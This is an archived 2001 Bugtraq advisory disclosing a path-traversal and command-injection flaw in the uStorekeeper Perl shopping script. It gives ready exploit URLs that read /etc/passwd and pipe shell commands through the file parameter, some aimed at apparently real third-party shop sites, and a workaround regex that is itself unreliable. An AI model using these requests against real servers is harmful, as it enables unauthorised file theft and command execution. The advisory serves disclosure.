[20008] in bugtraq
new advisory
daemon@ATHENA.MIT.EDU (UkR hacking team)
Tue Apr 3 17:50:02 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-ID: <200104030408.HAA79114@fatlady.ukr.net>
Date: Tue, 3 Apr 2001 07:08:47 +0300
Reply-To: UkR hacking team <ukrteam@ukr.net>
From: UkR hacking team <ukrteam@ukr.net>
To: BUGTRAQ@SECURITYFOCUS.COM
---=== UkR security team - Advisory ===---
uStorekeeper(tm) Online Shopping System - Runtime Script
- 'arbitrary file retreival' vulnerability
Date: 03.04.2001
Problem: input validation error.
Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
Product vendor: Microburst Technologies / http://www.uburst.com
Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd).
Workaround:
# this will help in somewhat...
$input =~ s/[(\.\.)|\/]//g;
Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
Greets
Exploit:
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
Example:
http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
Greets: my love Zemfirius, dev/ice security team, Legion2000 group, Void team, Acidfalz team, IHG team and other ppls.
